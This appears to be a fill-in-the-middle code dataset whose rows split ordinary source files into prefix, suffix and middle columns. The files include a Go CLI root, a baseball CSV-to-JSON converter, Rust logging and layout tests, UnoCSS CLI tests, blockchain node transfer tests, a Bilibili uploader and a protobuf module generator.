file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
root.go | /*
Copyright © 2021 NAME HERE <EMAIL ADDRESS>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package root
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"github.com/gmeghnag/omc/cmd"
"github.com/gmeghnag/omc/cmd/describe"
"github.com/gmeghnag/omc/cmd/etcd"
"github.com/gmeghnag/omc/cmd/get"
"github.com/gmeghnag/omc/cmd/helpers"
"github.com/gmeghnag/omc/cmd/logs"
"github.com/gmeghnag/omc/types"
"github.com/gmeghnag/omc/vars"
"github.com/spf13/cobra"
"github.com/spf13/viper"
)
// RootCmd represents the base command when called without any subcommands
var RootCmd = &cobra.Command{ // FLOW 4
Use: "omc",
Run: func(cmd *cobra.Command, args []string) { fmt.Println("Hello from omc CLI. :]") },
}
// Execute adds all child commands to the root command and sets flags appropriately.
// This is called by main.main(). It only needs to happen once to the RootCmd.
func Execute() {
cobra.CheckErr(RootCmd.Execute())
}
func init() { |
// initConfig reads in config file and ENV variables if set.
func initConfig() {
// fmt.Println("inside initConfig") FLOW 1
if vars.CfgFile != "" {
// Use config file from the flag.
viper.SetConfigFile(vars.CfgFile)
} else {
// Find home directory.
home, err := os.UserHomeDir()
cobra.CheckErr(err)
exist, _ := helpers.Exists(home + "/.omc.json")
if !exist {
config := types.Config{}
file, _ := json.MarshalIndent(config, "", " ")
_ = ioutil.WriteFile(vars.CfgFile, file, 0644)
}
// Search config in home directory with name ".omc" (without extension).
viper.AddConfigPath(home)
viper.SetConfigType("json")
viper.SetConfigName(".omc")
}
viper.AutomaticEnv() // read in environment variables that match
// If a config file is found, read it in.
if err := viper.ReadInConfig(); err == nil {
//fmt.Fprintln(os.Stderr, "Using config file:", viper.ConfigFileUsed())
omcConfigJson := types.Config{}
file, _ := ioutil.ReadFile(viper.ConfigFileUsed())
_ = json.Unmarshal([]byte(file), &omcConfigJson)
var contexts []types.Context
contexts = omcConfigJson.Contexts
for _, context := range contexts {
if context.Current == "*" {
vars.MustGatherRootPath = context.Path
if vars.Namespace == "" {
vars.Namespace = context.Project
}
break
}
}
if vars.MustGatherRootPath != "" {
exist, _ := helpers.Exists(vars.MustGatherRootPath + "/namespaces")
if !exist {
files, err := ioutil.ReadDir(vars.MustGatherRootPath)
if err != nil {
log.Fatal(err)
}
baseDir := ""
for _, f := range files {
if f.IsDir() {
baseDir = f.Name()
vars.MustGatherRootPath = vars.MustGatherRootPath + "/" + baseDir
break
}
}
if baseDir == "" {
fmt.Println("Some error occurred, wrong must-gather file composition")
os.Exit(1)
}
}
}
} else {
homePath, _ := os.UserHomeDir()
helpers.CreateConfigFile(homePath)
// TODO create the config file
}
}
|
//fmt.Println("inside init") //FLOW 0
cobra.OnInitialize(initConfig)
// Here you will define your flags and configuration settings.
// Cobra supports persistent flags, which, if defined here,
// will be global for your application.
RootCmd.PersistentFlags().StringVar(&vars.CfgFile, "config", "", "Config file to use (default is $HOME/.omc.json).")
RootCmd.PersistentFlags().StringVarP(&vars.Namespace, "namespace", "n", "", "If present, list the requested object(s) for a specific namespace.")
// Cobra also supports local flags, which will only run
// when this action is called directly.
RootCmd.AddCommand(
cmd.VersionCmd,
cmd.DeleteCmd,
cmd.ProjectCmd,
cmd.UseCmd,
get.GetCmd,
describe.DescribeCmd,
etcd.Etcd,
logs.Logs,
)
}
|
convert_game.py | import csv
import json
def read_data_file(filename):
all_records = []
with open(filename, mode='r') as csv_file:
csv_reader = csv.reader(csv_file)
row_count = 0
for row in csv_reader:
all_records.append(row)
return all_records
def parse_play_fields(play_fields):
plays = []
for p in play_fields: | temp["inning_number"] = int(p[1])
temp["home_field_indicator"] = int(p[2])
temp["player_code"] = p[3]
temp["count_at_action"] = p[4]
temp["all_pitches"] = p[5]
temp["play_events"] = p[6]
plays.append(temp)
return plays
def parse_sub_fields(sub_fields):
subs = []
for s in sub_fields:
temp = {}
temp["event_count"] = int(s[0])
temp["player_code"] = s[1]
temp["name"] = s[2]
temp["home_field_indicator"] = int(s[3])
temp["batting_order"] = int(s[4])
temp["field_position"] = int(s[5])
subs.append(temp)
return subs
def parse_info_fields(info_fields):
infos = []
for i in info_fields:
temp = {}
temp[i[0]] = i[1]
infos.append(temp)
return infos
def parse_start_fields(start_fields):
starts = []
for s in start_fields:
temp = {}
temp["player_code"] = s[0]
temp["name"] = s[1]
temp["home_field_indicator"] = int(s[2])
temp["batting_order"] = int(s[3])
temp["field_position"] = int(s[4])
starts.append(temp)
return starts
def parse_data_fields(data_fields):
datas = []
for d in data_fields:
temp = {}
temp["type"] = d[0]
temp["player_code"] = d[1]
temp["earned_runs"] = int(d[2])
datas.append(temp)
return datas
def get_fields(records):
id = ""
version = ""
play = []
info = []
start = []
data = []
sub = []
event_count = 0
for r in records:
if r[0] == "play":
r[0] = event_count
event_count += 1
play.append(r)
elif r[0] == "info":
info.append(r[1:])
elif r[0] == "start":
start.append(r[1:])
elif r[0] == "data":
data.append(r[1:])
elif r[0] == "sub":
r[0] = event_count
event_count += 1
sub.append(r)
elif r[0] == "com":
continue # This one we should ignore
elif r[0].endswith("adj"):
continue # This one we should ignore
elif r[0] == "id":
id = r[1]
elif r[0] == "version":
version = r[1]
else:
print("ERROR")
print(r)
return id, version, play, info, start, data, sub
def get_game(game_records):
id, version, plays, infos, starts, datas, subs = get_fields(game_records)
play_list = parse_play_fields(plays)
info_list = parse_info_fields(infos)
start_list = parse_start_fields(starts)
data_list = parse_data_fields(datas)
sub_list = parse_sub_fields(subs)
game = {}
game["id"] = id
game["version"] = version
game["plays"] = play_list
game["info"] = info_list
game["start"] = start_list
game["data"] = data_list
game["subs"] = sub_list
return game
def get_all_games(all_game_records):
all_games = []
for g in all_game_records:
all_games.append(get_game(g))
return json.dumps(all_games)
# path = "./../storage/ANA201808100.in"
# game_records = read_data_file(path)
# game = get_game(game_records)
#
# out = json.loads(game)
# print(out["id"]) | temp = {}
temp["event_count"] = int(p[0]) |
logging.rs | use fern::colors::{Color, ColoredLevelConfig};
use log::debug;
pub fn set_up_logging(name: &'static str) | {
// configure colors for the whole line
let colors_line = ColoredLevelConfig::new()
.error(Color::Red)
.warn(Color::Yellow)
// we actually don't need to specify the color for debug and info, they are white by default
.info(Color::White)
.debug(Color::White)
// depending on the terminals color scheme, this is the same as the background color
.trace(Color::BrightBlack);
// configure colors for the name of the level.
// since almost all of them are the same as the color for the whole line, we
// just clone `colors_line` and overwrite our changes
let colors_level = colors_line.clone().info(Color::Green);
// here we set up our fern Dispatch
fern::Dispatch::new()
.format(move |out, message, record| {
out.finish(format_args!(
"{color_line}[{level}{color_line}] {message}\x1B[0m",
color_line = format_args!(
"\x1B[{}m",
colors_line.get_color(&record.level()).to_fg_str()
),
level = colors_level.color(record.level()),
message = message,
));
})
// set the default log level. to filter out verbose log messages from dependencies, set
// this to Warn and overwrite the log level for your crate.
// .level(log::LevelFilter::Debug)
.level(log::LevelFilter::Warn)
// change log levels for individual modules. Note: This looks for the record's target
// field which defaults to the module path but can be overwritten with the `target`
// parameter:
// `info!(target="special_target", "This log message is about special_target");`
.level_for(name, log::LevelFilter::Debug)
// .level_for("dioxus", log::LevelFilter::Info)
// .level_for("pretty_colored", log::LevelFilter::Trace)
// output to stdout
.chain(std::io::stdout())
.apply()
.unwrap();
debug!("finished setting up logging! yay!");
} |
|
cli.test.ts | import { resolve } from 'path'
import fs from 'fs-extra'
import { afterAll, beforeAll, describe, expect, it } from 'vitest'
import { startCli } from '../packages/cli/src/cli-start'
export const tempDir = resolve('.temp')
export const cli = resolve(__dirname, '../packages/cli/src/cli.ts')
beforeAll(async () => {
await fs.remove(tempDir)
})
afterAll(async () => {
await fs.remove(tempDir)
})
describe('cli', () => {
it('builds uno.css', async () => {
const { output } = await runCli({
'views/index.html': '<div class="p-4 max-w-screen-md"></div>',
})
expect(output).toMatchSnapshot()
})
it('supports unocss.config.js', async () => {
const { output } = await runCli({
'views/index.html': '<div class="box"></div>',
'unocss.config.js': `
import { defineConfig } from 'unocss'
export default defineConfig({
shortcuts: [{ box: 'max-w-7xl mx-auto bg-gray-100 rounded-md shadow-sm p-4' }]
})
`.trim(),
})
expect(output).toMatchSnapshot()
})
it('uno.css exclude initialized class after changing file', async () => {
const fileName = 'views/index.html'
const initializedContent = '<div class="bg-blue"></div>'
const changedContent = '<div class="bg-red"></div>'
const testDir = getTestDir()
const absolutePathOfFile = resolve(testDir, fileName)
await fs.outputFile(absolutePathOfFile, initializedContent)
runAsyncChildProcess(testDir, './views/**/*', '-w')
const outputPath = resolve(testDir, 'uno.css')
for (let i = 50; i >= 0; i--) {
await sleep(50)
if (fs.existsSync(outputPath))
break
}
await fs.writeFile(absolutePathOfFile, changedContent)
// polling until update
for (let i = 50; i >= 0; i--) {
await sleep(50)
const output = await readUnocssFile(testDir)
if (i === 0 || output.includes('.bg-red'))
expect(output).toContain('.bg-red')
}
})
})
// ----- Utils -----
function sleep(time = 300) {
return new Promise<void>((resolve) => {
setTimeout(() => {
resolve()
}, time)
}) | }
function initOutputFiles(testDir: string, files: Record<string, string>) {
return Promise.all(
Object.entries(files).map(([path, content]) =>
fs.outputFile(resolve(testDir, path), content, 'utf8'),
),
)
}
function runAsyncChildProcess(cwd: string, ...args: string[]) {
return startCli(cwd, ['', '', ...args, '--no-preflights'])
}
function readUnocssFile(testDir: string) {
return fs.readFile(resolve(testDir, 'uno.css'), 'utf8')
}
async function runCli(files: Record<string, string>) {
const testDir = getTestDir()
await initOutputFiles(testDir, files)
await runAsyncChildProcess(testDir, 'views/**/*')
const output = await readUnocssFile(testDir)
return {
output,
}
} | }
function getTestDir() {
return resolve(tempDir, Math.round(Math.random() * 100000).toString()) |
percent_absolute_position.rs | #[test]
fn percent_absolute_position() | {
let layout = stretch::node::Node::new(
stretch::style::Style {
flex_direction: stretch::style::FlexDirection::Column,
size: stretch::geometry::Size {
width: stretch::style::Dimension::Points(60f32),
height: stretch::style::Dimension::Points(50f32),
..Default::default()
},
..Default::default()
},
vec![&stretch::node::Node::new(
stretch::style::Style {
position_type: stretch::style::PositionType::Absolute,
size: stretch::geometry::Size {
width: stretch::style::Dimension::Percent(1f32),
height: stretch::style::Dimension::Points(50f32),
..Default::default()
},
position: stretch::geometry::Rect {
start: stretch::style::Dimension::Percent(0.5f32),
..Default::default()
},
..Default::default()
},
vec![
&stretch::node::Node::new(
stretch::style::Style {
size: stretch::geometry::Size {
width: stretch::style::Dimension::Percent(1f32),
..Default::default()
},
..Default::default()
},
vec![],
),
&stretch::node::Node::new(
stretch::style::Style {
size: stretch::geometry::Size {
width: stretch::style::Dimension::Percent(1f32),
..Default::default()
},
..Default::default()
},
vec![],
),
],
)],
)
.compute_layout(stretch::geometry::Size::undefined())
.unwrap();
assert_eq!(layout.size.width, 60f32);
assert_eq!(layout.size.height, 50f32);
assert_eq!(layout.location.x, 0f32);
assert_eq!(layout.location.y, 0f32);
assert_eq!(layout.children[0usize].size.width, 60f32);
assert_eq!(layout.children[0usize].size.height, 50f32);
assert_eq!(layout.children[0usize].location.x, 30f32);
assert_eq!(layout.children[0usize].location.y, 0f32);
assert_eq!(layout.children[0usize].children[0usize].size.width, 30f32);
assert_eq!(layout.children[0usize].children[0usize].size.height, 50f32);
assert_eq!(layout.children[0usize].children[0usize].location.x, 0f32);
assert_eq!(layout.children[0usize].children[0usize].location.y, 0f32);
assert_eq!(layout.children[0usize].children[1usize].size.width, 30f32);
assert_eq!(layout.children[0usize].children[1usize].size.height, 50f32);
assert_eq!(layout.children[0usize].children[1usize].location.x, 30f32);
assert_eq!(layout.children[0usize].children[1usize].location.y, 0f32);
} |
|
test_multi_transfer.py | from tester import test_case, Node, NodePoll
import concurrent.futures
|
with Node(env, settings_node_1, logger) as node_1:
node_1.run_check_test()
with Node(env, settings_node_2, logger) as node_2:
node_2.run_check_test()
target_address = node_1.create_new_address(keys_path="keys1")
node_1.run_check_balance(address=target_address, balance=0)
node_2.run_check_balance(address=target_address, balance=0)
distributor_address = node_1.load_address(keys_path=node_1.DISTRIBUTOR_ADDRESS_PATH)
amount = 333
transaction_wait = 5
transaction_timeout = 3
node_2.run_check_transfer(to_address=target_address, amount=amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout, wait=transaction_wait)
node_2.run_check_balance(address=target_address, balance=amount)
node_1.run_check_balance(address=target_address, balance=amount)
return 0
@test_case("multi_transfer_connected_with_everything")
def main(env, logger):
count_nodes = 10
start_sync_port = 20302
start_rpc_port = 50152
waiting_time = 5
transaction_timeout = 5
transaction_wait = 5
with NodePoll() as pool:
pool.append(Node(env, Node.Settings(Node.Id(start_sync_port, start_rpc_port)), logger))
pool.last.start_node(waiting_time)
pool.last.run_check_test()
# initializing connections with nodes
for i in range(1, count_nodes):
curent_sync_port = start_sync_port + i
curent_rpc_port = start_rpc_port + i
pool.append(
Node(env, Node.Settings(Node.Id(curent_sync_port, curent_rpc_port), nodes=pool.ids),
logger))
pool.last.start_node(waiting_time)
for node in pool:
node.run_check_test()
addresses = [pool.last.create_new_address(keys_path=f"keys{i}") for i in range(1, len(pool))]
init_amount = 1000
distributor_address = pool.last.load_address(keys_path=Node.DISTRIBUTOR_ADDRESS_PATH)
# init addresses with amount
for to_address in addresses:
pool.last.run_check_balance(address=to_address, balance=0)
pool.last.run_check_transfer(to_address=to_address, amount=init_amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout, wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=init_amount)
for i in range(1, len(addresses) - 1):
from_address = addresses[i]
to_address = addresses[i + 1]
amount = i * 100
pool.last.run_check_transfer(to_address=to_address, amount=amount, from_address=from_address,
fee=0, timeout=transaction_timeout, wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=amount + init_amount)
first_address = addresses[0]
first_address_balance = init_amount
for node in pool:
node.run_check_balance(address=first_address, balance=first_address_balance)
return 0
@test_case("multi_transfer_connected_one_by_one")
def main(env, logger):
count_nodes = 10
start_sync_port = 20310
start_rpc_port = 50160
waiting_time = 5
transaction_timeout = 7
transaction_wait = 4
with NodePoll() as pool:
pool.append(Node(env, Node.Settings(Node.Id(start_sync_port, start_rpc_port)), logger))
pool.last.start_node(waiting_time)
pool.last.run_check_test()
# initializing connections with nodes
for i in range(1, count_nodes):
curent_sync_port = start_sync_port + i
curent_rpc_port = start_rpc_port + i
pool.append(
Node(env, Node.Settings(Node.Id(curent_sync_port, curent_rpc_port), nodes=[pool.last.settings.id, ]),
logger))
pool.last.start_node(waiting_time)
for node in pool:
node.run_check_test()
addresses = [pool.last.create_new_address(keys_path=f"keys{i}") for i in range(1, len(pool))]
init_amount = 1000
distributor_address = pool.last.load_address(keys_path=Node.DISTRIBUTOR_ADDRESS_PATH)
# init addresses with amount
for to_address in addresses:
pool.last.run_check_balance(address=to_address, balance=0)
pool.last.run_check_transfer(to_address=to_address, amount=init_amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout,
wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=init_amount)
for i in range(1, len(addresses) - 1):
from_address = addresses[i]
to_address = addresses[i + 1]
amount = i * 100
pool.last.run_check_transfer(to_address=to_address, amount=amount, from_address=from_address,
fee=0, timeout=transaction_timeout,
wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=amount + init_amount)
first_address = addresses[0]
first_address_balance = init_amount
for node in pool:
node.run_check_balance(address=first_address, balance=first_address_balance)
return 0
def node_transfers(node, addresses, transaction_wait):
shift = len(addresses) - 1
pos = 0
from_address = addresses[pos]
amount = 300
transaction_timeout = 40
for _ in range(len(addresses) * 5):
pos = (pos + shift) % len(addresses)
to_address = addresses[pos]
node.run_check_transfer(to_address=to_address, amount=amount, from_address=from_address, fee=0,
timeout=transaction_timeout, wait=transaction_wait)
from_address = to_address
@test_case("parallel_transfer_connected_with_everything")
def main(env, logger):
count_nodes = 7
start_sync_port = 20330
start_rpc_port = 50180
node_startup_time = 5
transaction_wait = 10
transaction_timeout = 42
init_amount = 1000
address_per_nodes = 3
with NodePoll() as pool:
pool.append(Node(env, Node.Settings(Node.Id(start_sync_port, start_rpc_port)), logger))
pool.last.start_node(node_startup_time)
pool.last.run_check_test()
# initializing connections with nodes
for i in range(1, count_nodes):
curent_sync_port = start_sync_port + i
curent_rpc_port = start_rpc_port + i
pool.append(
Node(env, Node.Settings(Node.Id(curent_sync_port, curent_rpc_port), nodes=pool.ids),
logger))
pool.last.start_node(node_startup_time)
for node in pool:
node.run_check_test()
addresses = [pool.last.create_new_address(keys_path=f"keys{i}") for i in
range(1, count_nodes * address_per_nodes + 1)]
distributor_address = pool.last.load_address(keys_path=Node.DISTRIBUTOR_ADDRESS_PATH)
# init addresses with amount
for to_address in addresses:
pool.last.run_check_balance(address=to_address, balance=0)
pool.last.run_check_transfer(to_address=to_address, amount=init_amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout,
wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=init_amount)
with concurrent.futures.ThreadPoolExecutor(len(pool)) as executor:
threads = []
for i in range(len(pool)):
first_address_number = i * address_per_nodes
last_address_number = (i * address_per_nodes) + address_per_nodes
threads.append(
executor.submit(node_transfers, pool[i], addresses[first_address_number:last_address_number],
transaction_wait))
for i in threads:
i.result()
for address in addresses:
for node in pool:
node.run_check_balance(address=address, balance=init_amount)
return 0 | @test_case("multi_transfer")
def main(env, logger):
settings_node_1 = Node.Settings(Node.Id(20300, 50150))
settings_node_2 = Node.Settings(Node.Id(20301, 50151), nodes=[settings_node_1.id, ]) |
bilibiliuploader.py | from . import core
from .util import cipher
from nonebot import logger
import json
class BilibiliUploader():
def __init__(self):
self.access_token = None
self.refresh_token = None
self.sid = None
self.mid = None
def login(self, username, password):
code, self.access_token, self.refresh_token, self.sid, self.mid, _ = core.login(username, password)
if code != 0: # success
logger.error("login fail, error code = {}".format(code))
def login_by_access_token(self, access_token, refresh_token=None):
self.access_token = access_token
self.refresh_token = refresh_token
self.sid, self.mid, _ = core.login_by_access_token(access_token)
def login_by_access_token_file(self, file_name):
|
def save_login_data(self, file_name=None):
login_data = json.dumps(
{
"access_token": self.access_token,
"refresh_token": self.refresh_token
}
)
try:
with open(file_name, "w+") as f:
f.write(login_data)
finally:
return login_data
def upload(self,
parts,
copyright: int,
title: str,
tid: int,
tag: str,
desc: str,
source: str = '',
cover: str = '',
no_reprint: int = 0,
open_elec: int = 1,
max_retry: int = 5,
thread_pool_workers: int = 1):
return core.upload(self.access_token,
self.sid,
self.mid,
parts,
copyright,
title,
tid,
tag,
desc,
source,
cover,
no_reprint,
open_elec,
max_retry,
thread_pool_workers)
def edit(self,
avid=None,
bvid=None,
parts=None,
insert_index=None,
copyright=None,
title=None,
tid=None,
tag=None,
desc=None,
source=None,
cover=None,
no_reprint=None,
open_elec=None,
max_retry: int = 5,
thread_pool_workers: int = 1):
if not avid and not bvid:
logger.warning("please provide avid or bvid")
return None, None
if not avid:
avid = cipher.bv2av(bvid)
if not isinstance(parts, list):
parts = [parts]
if type(avid) is str:
avid = int(avid)
core.edit_videos(
self.access_token,
self.sid,
self.mid,
avid,
bvid,
parts,
insert_index,
copyright,
title,
tid,
tag,
desc,
source,
cover,
no_reprint,
open_elec,
max_retry,
thread_pool_workers
)
| with open(file_name, "r") as f:
login_data = json.loads(f.read())
self.access_token = login_data["access_token"]
self.refresh_token = login_data["refresh_token"]
self.sid, self.mid, _ = core.login_by_access_token(self.access_token) |
gen.rs | use std::{
collections::{HashMap, HashSet},
fmt, fs,
path::{Path, PathBuf},
};
#[derive(Clone, Hash, PartialEq, Eq)]
pub struct Package {
raw: String,
escaped: String,
escaped_vec: Vec<String>,
}
impl fmt::Debug for Package {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "\"{}\"", self.raw)
}
}
impl From<&str> for Package {
fn from(v: &str) -> Self {
let vec = v
.split('.')
.map(escape)
.map(ToOwned::to_owned)
.collect::<Vec<_>>();
Self {
raw: v.to_owned(),
escaped: vec.join("."),
escaped_vec: vec,
}
}
}
impl Package {
fn from_escaped_vec(vec: Vec<String>) -> Self {
let raw = vec
.iter()
.map(|v| {
if v.starts_with("r#") {
v.chars().skip(2).collect::<String>()
} else {
v.to_owned()
}
})
.collect::<Vec<_>>()
.join(".");
Self {
raw,
escaped: vec.join("."),
escaped_vec: vec,
}
}
// https://doc.rust-lang.org/cargo/reference/features.html#features
// crates.io requires feature names to only contain ASCII letters, digits, _, or -.
fn feature_name(&self) -> String {
self.raw.split('.').collect::<Vec<_>>().join("-")
}
}
#[derive(Debug, Clone, Hash, PartialEq, Eq)]
pub struct Proto {
path: PathBuf,
package: Package,
imports: Vec<Proto>,
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Module {
package: Package,
include: bool,
imported_by: HashSet<Package>,
children: HashMap<String, Module>,
}
impl Module {
fn empty(package: Package) -> Self {
Self {
package,
include: false,
imported_by: HashSet::new(),
children: HashMap::new(),
}
}
}
impl Module {
fn gen_code(&self) -> String {
let include = if self.include {
let mut attr = self
.imported_by
.iter()
.map(|p| p.feature_name())
.collect::<Vec<_>>();
attr.sort();
let attr = attr
.into_iter()
.map(|f| format!(r#"feature = "{}","#, f))
.collect::<String>();
let attr = format!("#[cfg(any({}))]", attr);
format!(
"{attr}\ninclude_proto!(\"{package}\");\n",
attr = attr,
package = self.package.escaped,
)
} else {
String::new()
};
let mut vec = self.children.iter().collect::<Vec<_>>();
vec.sort_by_key(|v| v.0);
let children = vec
.into_iter()
.map(|(k, v)| {
format!(
"pub mod {name} {{ {children} }}\n",
name = k,
children = v.gen_code(),
)
})
.collect::<String>();
format!(
"{include} {children}",
include = include,
children = children
)
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct RootModule(HashMap<String, Module>);
impl RootModule {
pub fn gen_code(&self) -> String {
let mut vec = self.0.iter().collect::<Vec<_>>();
vec.sort_by_key(|v| v.0);
vec.into_iter()
.map(|(k, v)| {
format!(
"pub mod {name} {{ {children} }}\n",
name = k,
children = v.gen_code(),
)
})
.collect()
}
}
// https://doc.rust-lang.org/reference/keywords.html
fn escape(s: &str) -> &str {
match s {
// Lexer
"as" => "r#as",
"break" => "r#break",
"const" => "r#const",
"continue" => "r#continue",
"crate" => "r#crate",
"else" => "r#else",
"enum" => "r#enum",
"extern" => "r#extern",
"false" => "r#false",
"fn" => "r#fn",
"for" => "r#for",
"if" => "r#if",
"impl" => "r#impl",
"in" => "r#in",
"let" => "r#let",
"loop" => "r#loop",
"match" => "r#match",
"mod" => "r#mod",
"move" => "r#move",
"mut" => "r#mut",
"pub" => "r#pub",
"ref" => "r#ref",
"return" => "r#return",
"self" => "r#self",
"Self" => "r#Self",
"static" => "r#static",
"struct" => "r#struct",
"super" => "r#super",
"trait" => "r#trait",
"true" => "r#true",
"type" => "r#type",
"unsafe" => "r#unsafe",
"use" => "r#use",
"where" => "r#where",
"while" => "r#while",
// Lexer 2018+
"async" => "r#async",
"await" => "r#await",
"dyn" => "r#dyn",
// Reserved keywords
"abstract" => "r#abstract",
"become" => "r#become",
"box" => "r#box",
"do" => "r#do",
"final" => "r#final",
"macro" => "r#macro",
"override" => "r#override",
"priv" => "r#priv",
"typeof" => "r#typeof",
"unsized" => "r#unsized",
"virtual" => "r#virtual",
"yield" => "r#yield",
_ => s,
}
}
// https://developers.google.com/protocol-buffers/docs/reference/proto3-spec#package
// package = "package" fullIdent ";"
fn parse_package(line: &str) -> Option<Package> {
const PACKAGE: &str = "package";
if line.starts_with(PACKAGE) {
let package = line
.chars()
.skip(PACKAGE.len())
.take_while(|&c| c != ';')
.collect::<String>()
.trim()
.to_owned();
Some(package.as_str().into())
} else {
None
}
}
// https://developers.google.com/protocol-buffers/docs/reference/proto3-spec#import_statement
// import = "import" [ "weak" | "public" ] strLit ";"
fn parse_import(line: &str) -> Option<String> {
const IMPORT: &str = "import";
if line.starts_with(IMPORT) {
let import = line
.chars()
.skip(IMPORT.len())
.skip_while(|&c| c != '\'' && c != '"')
.skip(1)
.take_while(|&c| c != '\'' && c != '"') // TODO: Should I check to see if it's the same quart?
.collect::<String>() // TODO: Should I check to see if the following letter is semicolon?
.trim()
.to_owned();
Some(import)
} else {
None
}
}
pub fn find_proto(root: PathBuf) -> Vec<Proto> {
let mut cache = HashMap::new();
find_proto_rec(root.clone(), root, &mut cache)
}
fn find_proto_rec(
root: PathBuf,
dir: impl AsRef<Path>,
cache: &mut HashMap<PathBuf, Proto>,
) -> Vec<Proto> {
let mut ret = Vec::new();
let cur = fs::read_dir(dir.as_ref())
.unwrap()
.map(Result::unwrap)
.map(|dir| dir.path())
.map(|path| (path.metadata().unwrap(), path))
.collect::<Vec<_>>();
let iter = cur
.clone()
.into_iter()
.filter(|(meta, _)| meta.is_file())
.filter(|(_, path)| path.extension().filter(|ex| ex == &"proto").is_some());
for (_, path) in iter {
let proto = if let Some(proto) = cache.get(&path) {
proto.clone()
} else {
let prot = proto_rec(root.clone(), path.clone(), cache);
cache.insert(path, prot.clone());
prot
};
ret.push(proto);
}
let iter = cur.into_iter().filter(|(meta, _)| meta.is_dir());
for (_, path) in iter {
let mut protos = find_proto_rec(root.clone(), path, cache);
ret.append(&mut protos);
}
ret
}
fn proto_rec(root: PathBuf, path: PathBuf, map: &mut HashMap<PathBuf, Proto>) -> Proto {
let mut package = None;
let mut imports = Vec::new();
for line in fs::read_to_string(path.as_path()).unwrap().lines() {
if let Some(pkg) = parse_package(line) {
package = Some(pkg);
} else if let Some(import) = parse_import(line) {
if !import.starts_with("google/protobuf") {
let mut path = root.clone();
path.push(import);
if let Some(proto) = map.get(path.as_path()) {
imports.push(proto.clone());
} else {
let prot = proto_rec(root.clone(), path.clone(), map);
imports.push(prot.clone());
map.insert(path, prot);
}
}
}
}
Proto {
path,
package: package.unwrap(),
imports,
}
}
fn add_deps_rec(src: &Proto, proto: &Proto, map: &mut HashMap<Package, HashSet<Package>>) {
let e = map
.entry(proto.package.clone())
.or_insert_with(HashSet::new);
e.insert(src.package.clone());
for import in proto.imports.iter() {
add_deps_rec(src, &import, map);
}
}
fn deps_resolver(protos: &[Proto]) -> HashMap<Package, HashSet<Package>> {
let mut map = HashMap::new();
for p in protos.iter() {
add_deps_rec(p, p, &mut map);
}
map
}
pub fn feature_gates(protos: &[Proto], broken_features: &[String]) -> String {
let pkgs = protos
.iter()
.map(|p| p.package.feature_name())
.collect::<HashSet<_>>();
let mut pkgs = pkgs.into_iter().collect::<Vec<_>>();
pkgs.sort();
pkgs.into_iter()
.map(|f| {
let is_broken = broken_features.contains(&f);
format!("{}{} = []", is_broken.then(|| "# ").unwrap_or_default(), f)
})
.collect::<Vec<_>>()
.join("\n")
}
pub fn feature_names(protos: &[Proto], broken_features: &[String]) -> String |
pub fn proto_path(protos: &[Proto]) -> Vec<PathBuf> {
let mut ret = protos
.iter()
.map(|p| p.path.clone())
// TODO: There is a syntax error in google.ads.googleads.v5 and google.ads.googleads.v6.
// See https://github.com/googleapis/googleapis/pull/622 and https://github.com/mechiru/googapis/pull/9.
.filter(|p| {
let path = p.to_str().unwrap();
!(path.contains("google/ads/googleads/v5") || path.contains("google/ads/googleads/v6"))
})
.collect::<Vec<_>>();
ret.sort();
ret
}
pub fn from_protos(protos: Vec<Proto>) -> RootModule {
let mut map = HashMap::new();
let resolver = deps_resolver(&protos);
for proto in protos {
let mut iter = proto.package.escaped_vec.clone().into_iter();
let mut package = Vec::new();
let pkg = iter.next().unwrap();
package.push(pkg.clone());
let mut e = map
.entry(pkg)
.or_insert_with(|| Module::empty(Package::from_escaped_vec(package.clone())));
while let Some(pkg) = iter.next() {
package.push(pkg.clone());
e = e
.children
.entry(pkg)
.or_insert_with(|| Module::empty(Package::from_escaped_vec(package.clone())));
}
assert_eq!(proto.package, e.package);
e.include = true;
if let Some(pkgs) = resolver.get(&e.package) {
for pkg in pkgs {
e.imported_by.insert(pkg.clone());
}
}
}
RootModule(map)
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_pacakge_from_escaped_vec() {
let vec = vec!["mechiru".into(), "r#type".into(), "r#as".into()];
assert_eq!(
Package::from_escaped_vec(vec.clone()),
Package {
raw: "mechiru.type.as".into(),
escaped: "mechiru.r#type.r#as".into(),
escaped_vec: vec,
}
);
}
#[test]
fn test_package_from() {
assert_eq!(
Package::from("mechiru.type.as"),
Package::from_escaped_vec(vec!["mechiru".into(), "r#type".into(), "r#as".into()])
);
}
#[test]
fn test_feature_name() {
assert_eq!(
Package::from("mechiru.type.as").feature_name(),
"mechiru-type-as".to_owned()
);
}
#[test]
fn test_parse_package() {
assert_eq!(parse_package("package mechiru;"), Some("mechiru".into()));
assert_eq!(
parse_package("package mechiru.storage;"),
Some("mechiru.storage".into())
);
}
#[test]
fn test_parse_import() {
assert_eq!(
parse_import(r#"import "mechiru/common.proto";"#),
Some("mechiru/common.proto".into())
);
assert_eq!(
parse_import(r#"import weak "mechiru/common.proto";"#),
Some("mechiru/common.proto".into())
);
assert_eq!(
parse_import(r#"import public "mechiru/common.proto";"#),
Some("mechiru/common.proto".into())
);
}
fn protos() -> Vec<Proto> {
vec![
Proto {
path: PathBuf::from("/a/b.proto"),
package: "a".into(),
imports: vec![
Proto {
path: PathBuf::from("/a/c.proto"),
package: "a".into(),
